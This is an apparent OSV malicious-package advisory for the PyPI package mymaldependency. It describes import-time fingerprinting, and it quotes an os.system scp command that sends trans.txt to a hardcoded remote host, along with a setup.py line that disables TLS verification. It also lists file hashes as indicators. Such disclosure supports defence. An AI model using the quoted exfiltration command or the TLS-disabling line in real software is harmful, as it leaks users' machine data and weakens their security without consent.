MAL-2026-3694

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mymaldependency/MAL-2026-3694.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-3694
Published
2026-05-12T07:43:18Z
Modified
2026-05-13T20:22:40.161523Z
Summary
Malicious code in mymaldependency (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1)

MyMalDependency_package/__init__.py executes on every import: it calls os.uname() and os.getcwd(), writes the results to ./trans.txt in the installer's working directory, then invokes os.system('scp trans.txt Dell@192.168.129.164:E:\download') to ship the file to a hardcoded remote host. This is a one-way exfiltration of installer machine fingerprint data combined with unconsented shell command execution at import time. setup.py additionally disables TLS certificate verification globally (ssl._create_default_https_context = ssl._create_unverified_context), weakening the installer's trust posture during install. Source comments ('#恶意的依赖项' — Chinese for 'malicious dependency') and a startup print ('start mal dependency') explicitly declare malicious intent. Metadata is placeholder (author '1', UNKNOWN fields, description 'test to create package'). Regardless of whether the hardcoded private-range destination IP is currently reachable, the code pattern constitutes active attack behavior against anyone who imports the package.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-002298",
            "import_time": "2026-05-13T20:10:54.545210822Z",
            "sha256": "38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1",
            "source": "amazon-inspector",
            "modified_time": "2026-05-12T19:03:07Z",
            "versions": [
                "2.1.1"
            ]
        }
    ]
}
References
Credits

Affected packages

PyPI / mymaldependency

Package

Affected ranges

Affected versions

2.*
2.1.1

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "MyMalDependency_package/__init__.py",
            "sha256": "9a0b6296be73e06b09502381d5d21c2f6c47200e6223394c85a8efc8c2f15132",
            "tlsh": "f3e0c69120a81ba8410bf0ea8e0cc35a9812f45283b06020c700a4aece0a95da018b79"
        },
        {
            "path": "setup.py",
            "sha256": "839ec74ba3a23ad2966dfc00b5b13ab295dc8febf97cd1d578c369544eaa5bf5",
            "tlsh": "96e0c6328801f120a0c2b4eb09713039fb959c3a1420f0c433c1034916d518a9a0b81e"
        },
        {
            "path": "PKG-INFO",
            "sha256": "b075784fbf82fa60dce71ec1b095a4938d340343cab5ecb272c525f450d56d05",
            "tlsh": "6cd023c8b5739015d0b2465614d043e74dd0132878dd05d95840350417272c31b4e073"
        }
    ],
    "package_integrity": [
        {
            "filename": "MyMalDependency-2.1.1.tar.gz",
            "hashes": {
                "md5": "02bc3c535a8809858a1f8426302b94f8",
                "blake2b_256": "75ad00854a6201068d1160b864a38ffaece8351a7732243a9bc4d1aaa4a688d8",
                "sha256": "45899cb57dafe5b8e002a871c9084bb4a4d086f96904f2010d175f4455eac8f6"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mymaldependency/MAL-2026-3694.json"